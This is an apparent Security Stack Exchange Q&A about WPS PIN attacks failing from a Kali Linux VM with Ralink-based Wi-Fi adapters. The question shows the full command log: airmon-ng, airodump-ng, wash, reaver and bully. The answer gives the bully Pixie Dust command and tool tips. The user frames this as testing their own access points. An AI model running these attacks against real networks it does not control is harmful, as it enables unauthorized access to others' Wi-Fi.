4

My hardware looks like this : Lenovo Laptop running RHEL, and Virtual Machine Manager launching a VM with Kali Linux. Tried these network cards :

  • TL-WN722N
  • AWUS051NH
  • AWUS036NH

I am booting the VM into live mode (i don't need persistent storage) and i share one of these network cards at a time. With all these i have the exact same results.

First i run these two lines in order to have access through ssh for better terminal experience etcetera.

$ sed -i -e 's/prohibit-password/yes/g' /etc/ssh/sshd_config
$ service ssh start

Diving into setting up the network interfaces : 

root@kali:~# airmon-ng start wlan0

Found 3 processes that could cause trouble. If airodump-ng, aireplay-ng or airtun-ng stops working after a short period of time, you may want to kill (some of) them!

  PID Name   
  963 NetworkManager
 1087 dhclient
 1534 wpa_supplicant

PHY Interface   Driver      Chipset

phy0    wlan0       rt2800usb   Ralink Technology, Corp. RT3572

        (mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon) 
        (mac80211 station mode vif disabled for [phy0]wlan0)

root@kali:~# iwconfig  eth0      no wireless extensions.

wlan0mon  IEEE 802.11abgn  ESSID:off/any  
          Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm   
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off
lo        no wireless extensions.

root@kali:~# ifconfig wlan0mon down 
root@kali:~# iwconfig wlan0mon mode monitor 
root@kali:~# ifconfig wlan0mon up   
root@kali:~# iwconfig eth0      no wireless extensions.

wlan0mon  IEEE 802.11abgn  Mode:Monitor  Frequency:2.457 GHz  Tx-Power=20 dBm   
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Power Management:off
 lo        no wireless extensions.

And after that some discovery : 

 root@kali:~# airodump-ng wlan0mon

    BSSID    PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 XX:XX:XX:XX  -80        2        0    0   1  54e  WPA2 CCMP   MGT  NumA
 XX:XX:XX:XX  -28        2        0    0   6  54e  WPA2 CCMP   PSK  NumB 
 XX:XX:XX:XX  -81        2        0    0   11  54e  WPA2 CCMP   MGT  NumC


root@kali:~# wash -i wlan0mon    

Wash v1.5.2 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212

BSSID                  Channel       RSSI       WPS Version       WPS Locked        ESSID
---------------------------------------------------------------------------------------------------------------
[!] Found packet with bad FCS, skipping...
[!] Found packet with bad FCS, skipping...
[!] Found packet with bad FCS, skipping...
[!] Found packet with bad FCS, skipping...


root@kali:~# wash -i wlan0mon -C

Wash v1.5.2 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212

BSSID                  Channel       RSSI       WPS Version       WPS Locked        ESSID
---------------------------------------------------------------------------------------------------------------
XX:XX       1            -73        1.0               No                WiA
XX:XX       6            -27        1.0               No                WiB
XX:XX       11            -77        1.0               No                WiC

And now the attack part : 

root@kali:~# reaver -i wlan0mon -b XX:XX:XX:XX -vv       

Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212

[+] Waiting for beacon from XX:XX:XX:XX
[+] Switching wlan0mon to channel 1
[+] Switching wlan0mon to channel 2
[+] Switching wlan0mon to channel 3
[+] Switching wlan0mon to channel 4
[+] Switching wlan0mon to channel 5
[+] Switching wlan0mon to channel 6
[+] Switching wlan0mon to channel 7
[+] Switching wlan0mon to channel 8
[+] Switching wlan0mon to channel 11
[!] WARNING: Failed to associate with XX:XX:XX:XX (ESSID: ESSIDA)
[!] WARNING: Failed to associate with XX:XX:XX:XX (ESSID: ESSIDA)
[!] WARNING: Failed to associate with XX:XX:XX:XX (ESSID: ESSIDA)

And also using bully : 

root@kali:~# bully -b XX:XX:XX wlan0mon -c 11
[!] Bully v1.0-22 - WPS vulnerability assessment utility
[+] Switching interface 'wlan0mon' to channel '11'
[!] Using 'XX:XX:XX' for the source MAC address
[+] Datalink type set to '127', radiotap headers present
[+] Scanning for beacon from 'XX:XX:XX' on channel '11'
[!] Excessive (3) FCS failures while reading next packet
[!] Excessive (3) FCS failures while reading next packet
[!] Excessive (3) FCS failures while reading next packet
[!] Disabling FCS validation (assuming --nofcs)
[+] Got beacon for 'TargetA' (XX:XX:XX)
[!] Creating new randomized pin file '/root/.bully/pins'
[+] Index of starting pin number is '0000000'
[+] Last State = 'NoAssoc'   Next pin '36490264'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '36490264'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '36490264'

I know that at least 2 of my playground access points are vulnerable to the attack based on the mac addresses (pixie dust i think called). I have managed to crack them using some cheap android no name android phone. And this attack does not work with any combination of my network cards / neither target access points.

There must be either some configuration that i am missing, or some hardware compatibility that i miss.

I know that these network cards are meant for monitoring mode, i suppose they should support wps also, but i haven't manage it to work yet. Do i need a specific one in order to be able to do the WPS attacks?

AviD
  • 72,138
  • 22
  • 136
  • 218
Dimitris Sapikas
  • 141
  • 1
  • 1
  • 3

1 Answers1

6

I have a couple of recommendations for you.

First of all. If I'm not wrong, both of your Alfa's are Ralink chipset based. You must know that Ralink chipsets and reaver have an awful results. It's much better to use bully.

Another important thing could be on reaver to use -N (--no-nacks) argument. Try using it. Using this parameter, it will not send NACK messages when out of order packets are received. Maybe it can help you but as I said on my first point... using Ralink + reaver = crap.

The Pixie Dust attack can be integrated directly on Reaver and Bully if you have certain version or higher (1.1 for Bully and 1.5.2 for Reaver). So, from your logs, it looks like you can perform it using Reaver... but you have the problem again (Ralink blah blah blah...). So my suggestion is, update your bully version. On Kali you can get version 1.1 directly from repositories. And then you can perform it directly using this command:

bully wlan0mon -b XX:XX:XX:XX:XX:XX -c 11 -d -v 3

Note1 of course you must have installed pixiewps too. You can get it easily through apt on Kali, it is on repositories.

Note2 On bully 1.1 you can increase verbosity level from 3 to 4. This doesn't work on previous versions.

If you are pretty sure about some of the APs are vulnerable to WPS attacks, you can test it directly using -p xxxxxxxx option. I guess you are the owner of the APs, aren't you? and of course you know the pin. You can try using this option in order to test if you are able to get the password. It is useful to know what combination of software and chipset you have is working ok.

A last recommendation, try some wireless scripts. One on which I'm collaborating airgeddon.

Hope it helps!

OscarAkaElvis
  • 5,185
  • 3
  • 17
  • 48